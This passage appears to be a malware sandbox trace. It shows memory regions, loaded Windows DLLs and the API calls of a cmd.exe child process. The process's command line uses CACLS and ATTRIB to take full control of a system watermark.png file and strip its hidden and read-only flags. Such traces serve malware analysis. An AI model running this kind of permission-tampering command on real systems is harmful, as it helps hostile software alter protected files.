mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19509 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 19510 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 19511 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 19512 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19513 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19514 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19515 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19516 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19517 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19518 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19519 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19520 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19521 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19522 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19523 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 19524 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19525 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 296 os_tid = 0x47c Process: id = "235" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167a0" os_pid = "0x170" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19548 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19549 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19550 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19551 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 19552 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 19553 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19554 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19555 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19556 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 19557 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19558 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19559 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19560 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19561 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 19562 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 19563 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 19564 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19565 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19566 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19567 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19568 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19569 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19570 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19571 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19572 start_va = 0x410000 end_va = 0x4d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 19573 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19574 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 19575 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 19576 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 19577 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 19578 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 19579 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 19580 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 19581 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 19582 start_va = 0x1380000 end_va = 0x164efff entry_point = 0x1380000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 297 os_tid = 0xcf8 [0150.288] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa94 | out: lpSystemTimeAsFileTime=0x26fa94*(dwLowDateTime=0x9383b500, dwHighDateTime=0x1d440a9)) [0150.288] GetCurrentProcessId () returned 0x170 [0150.288] GetCurrentThreadId () returned 0xcf8 [0150.288] GetTickCount () returned 0x2e7fd [0150.288] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa8c | out: lpPerformanceCount=0x26fa8c*=20707728273) returned 1 [0150.289] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0150.289] __set_app_type (_Type=0x1) [0150.289] __p__fmode () returned 0x76b331f4 [0150.289] __p__commode () returned 0x76b331fc [0150.289] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0150.289] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0150.289] GetCurrentThreadId () returned 0xcf8 [0150.289] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcf8) returned 0x38 [0150.289] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0150.289] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0150.289] SetThreadUILanguage (LangId=0x0) returned 0x409 [0150.289] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0150.289] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fa24 | out: phkResult=0x26fa24*=0x0) returned 0x2 [0150.289] VirtualQuery (in: lpAddress=0x26fa5b, lpBuffer=0x26f9f4, dwLength=0x1c | out: lpBuffer=0x26f9f4*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0150.290] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f9f4, dwLength=0x1c | out: lpBuffer=0x26f9f4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0150.290] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f9f4, dwLength=0x1c | out: lpBuffer=0x26f9f4*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0150.290] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f9f4, dwLength=0x1c | out: lpBuffer=0x26f9f4*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0150.290] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f9f4, dwLength=0x1c | out: lpBuffer=0x26f9f4*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0150.290] GetConsoleOutputCP () returned 0x1b5 [0150.290] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.290] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0150.290] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.290] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0150.290] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.290] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0150.290] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.290] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0150.290] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.290] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0150.291] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.291] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0150.291] GetEnvironmentStringsW () returned 0x320370* [0150.291] FreeEnvironmentStringsW (penv=0x320370) returned 1 [0150.291] GetEnvironmentStringsW () returned 0x320370* [0150.291] FreeEnvironmentStringsW (penv=0x320370) returned 1 [0150.291] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e994 | out: phkResult=0x26e994*=0x40) returned 0x0 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x0, lpData=0x26e9a0*=0x20, lpcbData=0x26e998*=0x1000) returned 0x2 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x4, lpData=0x26e9a0*=0x1, lpcbData=0x26e998*=0x4) returned 0x0 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x0, lpData=0x26e9a0*=0x1, lpcbData=0x26e998*=0x1000) returned 0x2 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x4, lpData=0x26e9a0*=0x0, lpcbData=0x26e998*=0x4) returned 0x0 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x4, lpData=0x26e9a0*=0x40, lpcbData=0x26e998*=0x4) returned 0x0 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x4, lpData=0x26e9a0*=0x40, lpcbData=0x26e998*=0x4) returned 0x0 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x0, lpData=0x26e9a0*=0x40, lpcbData=0x26e998*=0x1000) returned 0x2 [0150.291] RegCloseKey (hKey=0x40) returned 0x0 [0150.291] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e994 | out: phkResult=0x26e994*=0x40) returned 0x0 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x0, lpData=0x26e9a0*=0x40, lpcbData=0x26e998*=0x1000) returned 0x2 [0150.291] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x4, lpData=0x26e9a0*=0x1, lpcbData=0x26e998*=0x4) returned 0x0 [0150.292] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x0, lpData=0x26e9a0*=0x1, lpcbData=0x26e998*=0x1000) returned 0x2 [0150.292] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x4, lpData=0x26e9a0*=0x0, lpcbData=0x26e998*=0x4) returned 0x0 [0150.292] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x4, lpData=0x26e9a0*=0x9, lpcbData=0x26e998*=0x4) returned 0x0 [0150.292] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x4, lpData=0x26e9a0*=0x9, lpcbData=0x26e998*=0x4) returned 0x0 [0150.292] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e99c, lpData=0x26e9a0, lpcbData=0x26e998*=0x1000 | out: lpType=0x26e99c*=0x0, lpData=0x26e9a0*=0x9, lpcbData=0x26e998*=0x1000) returned 0x2 [0150.292] RegCloseKey (hKey=0x40) returned 0x0 [0150.292] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886378 [0150.292] srand (_Seed=0x5b886378) [0150.292] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"" [0150.292] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\"" [0150.292] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.292] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x321ad0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0150.292] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.292] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.292] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0150.292] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0150.292] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0150.293] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0150.293] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0150.293] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0150.293] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0150.293] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0150.293] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0150.293] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0150.293] GetEnvironmentStringsW () returned 0x3224c0* [0150.293] FreeEnvironmentStringsW (penv=0x3224c0) returned 1 [0150.293] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.293] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0150.293] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0150.293] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0150.293] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0150.293] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0150.293] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0150.293] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0150.293] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0150.293] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0150.293] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f760 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.293] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f760, lpFilePart=0x26f75c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f75c*="Desktop") returned 0x18 [0150.293] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0150.293] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f4dc | out: lpFindFileData=0x26f4dc) returned 0x320b50 [0150.293] FindClose (in: hFindFile=0x320b50 | out: hFindFile=0x320b50) returned 1 [0150.294] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f4dc | out: lpFindFileData=0x26f4dc) returned 0x320b50 [0150.294] FindClose (in: hFindFile=0x320b50 | out: hFindFile=0x320b50) returned 1 [0150.294] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f4dc | out: lpFindFileData=0x26f4dc) returned 0x320b50 [0150.294] FindClose (in: hFindFile=0x320b50 | out: hFindFile=0x320b50) returned 1 [0150.294] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0150.294] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0150.294] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0150.294] GetEnvironmentStringsW () returned 0x320370* [0150.294] FreeEnvironmentStringsW (penv=0x320370) returned 1 [0150.294] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.295] GetConsoleOutputCP () returned 0x1b5 [0150.295] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.295] GetUserDefaultLCID () returned 0x409 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f8a0, cchData=128 | out: lpLCData="0") returned 2 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f8a0, cchData=128 | out: lpLCData="0") returned 2 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f8a0, cchData=128 | out: lpLCData="1") returned 2 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0150.295] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0150.296] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0150.296] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0150.296] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0150.296] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0150.296] GetConsoleTitleW (in: lpConsoleTitle=0x310a00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.297] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0150.297] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0150.297] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0150.297] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0150.297] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0150.298] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0150.298] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0150.298] _wcsicmp 